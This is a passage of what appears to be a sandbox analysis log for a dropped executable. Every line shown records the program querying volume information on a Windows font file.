          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
